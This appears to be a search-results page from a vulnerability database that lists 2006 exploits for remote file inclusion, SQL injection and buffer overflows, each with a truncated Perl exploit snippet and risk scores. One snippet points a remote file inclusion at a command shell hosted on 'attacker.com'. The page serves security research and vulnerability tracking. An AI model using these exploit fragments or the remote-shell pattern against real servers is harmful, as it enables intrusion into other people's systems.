Lucene search
+L

984 matches found

Exploit DB
Exploit DB
added 2006/10/11 12:0 a.m.45 views

PHP News Reader 2.6.4 - 'phpBB.inc.php' Remote File Inclusion

!/usr/bin/perl PHP News Reader Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://pnews.sourceforge.net/ use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ====== Change This Line With Your Personal Script print...

5.1CVSS5.8AI score0.0256EPSS
SaveExploits2
exploitpack
exploitpack
added 2006/09/29 12:0 a.m.44 views

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion

Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...

7.5AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/09/29 12:0 a.m.25 views

Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also...

7.5CVSS5.8AI score0.02468EPSS
SaveExploits2
exploitpack
exploitpack
added 2006/09/25 12:0 a.m.26 views

BBSNew 2.0.1 - index2.php Remote File Inclusion

BBSNew 2.0.1 - index2.php Remote File Inclusion source: https://www.securityfocus.com/bid/20204/info bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary...

7.5AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/09/25 12:0 a.m.27 views

BBSNew 2.0.1 - 'index2.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/20204/info bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with th...

7.5CVSS5.8AI score0.02495EPSS
SaveExploits3
zdt
zdt
added 2006/09/18 12:0 a.m.17 views

AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit

Exploit for unknown platform in category web applications ============================================================= AlstraSoft E-Friends = 4.85 Remote Command Execution Exploit ============================================================= !/usr/bin/perl AlstraSoft Efriends 4.85 Remote Command...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2006/09/13 12:0 a.m.34 views

mercur-login.pl.txt

!/usr/bin/perl Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English version Perl script based on Sami FTP server remote exploit by Critical Security http://www.securityfocus.com/bid/17138 acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 2 print...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/09/11 12:0 a.m.38 views

Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)

!/usr/bin/perl Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English version Perl script based on Sami FTP server remote exploit by Critical Security https://www.securityfocus.com/bid/17138 acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 2 print...

10CVSS5.8AI score0.68147EPSS
SaveExploits16
exploitpack
exploitpack
added 2006/08/24 12:0 a.m.18 views

Wikepage Opus 10 2006.2a (lng) - Remote Command Execution

Wikepage Opus 10 2006.2a lng - Remote Command Execution !/usr/bin/perl WIKEPAGE "; $socket = IO::Socket::INET-newProto="tcp", PeerAddr="$server", PeerPort="http80" || die "- Cannot not connect to host !\n"; print $socket "GET ".$path.$pcode." HTTP/1.1\r\n"; print $socket "User-Agent:...

0.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/08/23 12:0 a.m.32 views

VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion

!/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Pred...

7.5CVSS5.8AI score0.03541EPSS
SaveExploits2
Exploit DB
Exploit DB
added 2006/08/23 12:0 a.m.41 views

phpBB All Topics Mod 1.5.0 - 'start' SQL Injection

!/usr/bin/perl print q / \ \ \ ,, / / '-./.-' .--' '--. / / /""\ \ \ SpiderZ ForumZ Security | | Insert URL = without http = ; $server = ; chop $server; print q = Insert directory = es: /forum/ - /phpBB2/ = ; $dir = ; chop $dir; print q = User ID = Number: = ; $user = ; chop $user; if !$ARGV2...

7.5CVSS5.8AI score0.01109EPSS
SaveExploits3
seebug.org
seebug.org
added 2006/08/22 12:0 a.m.12 views

MDaemon POP3 Server &lt; 9.06 (USER) Remote Buffer Overflow PoC

No description provided by source. PoC for Mdaemon POP3 preauth heap overflow Coded by Leon Juranic [email protected] Infigo IS http://www.infigo.hr $host = '192.168.0.105'; use IO::Socket; for $x = 0 ; $x 12 ; $x++ $sock = new IO::Socket::INET PeerAddr = $host,PeerPort = '110', Proto = 'tcp...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2006/08/22 12:0 a.m.17 views

MDaemon POP3 Server 9.06 - USER Remote Buffer Overflow (PoC)

MDaemon POP3 Server 9.06 - USER Remote Buffer Overflow PoC PoC for Mdaemon POP3 preauth heap overflow Coded by Leon Juranic Infigo IS $host = '192.168.0.105'; use IO::Socket; for $x = 0 ; $x $host,PeerPort = '110', Proto = 'tcp' || die "socket error\n\n"; recv $sock, $var, 10000,0; print $var;...

0.3AI score
SaveExploits0
zdt
zdt
added 2006/08/20 12:0 a.m.28 views

SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= SimpleBlog use IO::Socket; if@ARGV != 3 usage; else exploit; sub header print " SimpleBlog 2.0 SQL Injection Exploit \r\n"; print " www.asianeagle.org \r\n"; sub usage header;...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2006/08/17 12:0 a.m.32 views

getpwnedmail-ppc.pl.txt

!/usr/bin/perl getpwnedmail.pl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright c 1999 David Nicol kevin-finisterres-mac-mini: kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhos...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/08/14 12:0 a.m.80 views

Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)

!/usr/bin/perl Creator: K-sPecial xzziroz.net of .aware awarenetwork.org Name: bid-18056.pl Date: 08/12/2006 Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public exploits and not either of them worked not that they don't but coding my own is generaly...

5.1CVSS5.8AI score0.53333EPSS
SaveExploits14
zdt
zdt
added 2006/07/27 12:0 a.m.39 views

eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ============================================================== eIQnetworks ESA Syslog Server Remote Buffer Overflow Exploit ============================================================== !/usr/bin/perl -w http://www.digitalmunition.com...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/07/20 12:0 a.m.40 views

Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash

!/usr/bin/perl Stack overflow in wininet.dll while parsing huge 1M Content-Type response ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow. discovered by Firestorm Usage: 1 run this code 2 open http://127.0.0.1/ with IE use IO::Socket; my $sock=new IO::Socket::INE...

5CVSS5.8AI score0.35825EPSS
SaveExploits2
Exploit DB
Exploit DB
added 2006/07/10 12:0 a.m.55 views

SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)

!/usr/bin/perl PoC Exploit By [email protected] Remote Buffer Overflow in sipXtapi use IO::Socket; use strict; print "sipXtapi Exploit by Michael Thumann \n\n"; if not $ARGV0 print "Usage: sipx.pl \n"; exit; $target=$ARGV0; my $source ="127.0.0.1"; my $targetport = 5060; my $user ="bad"; my...

7.5CVSS5.8AI score0.67509EPSS
SaveExploits15
seebug.org
seebug.org
added 2006/07/02 12:0 a.m.43 views

BXCP &lt;= 0.3.0.4 (where) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; print q ------------------------------------------------------------------------------------- BXCP exploit by x23 curse-crew.de geekbar.cx.la geeknet.uttx.net use: bxcp.pl server dir id sample: $ perl bxcp.pl bxcp.com / 1 connectin...

7.1AI score
SaveExploits0
Rows per page
Query Builder